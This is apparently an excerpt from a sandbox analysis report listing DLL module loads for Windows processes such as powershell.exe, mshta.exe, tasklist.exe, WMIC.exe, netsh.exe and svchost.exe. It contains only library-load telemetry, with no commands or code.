Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
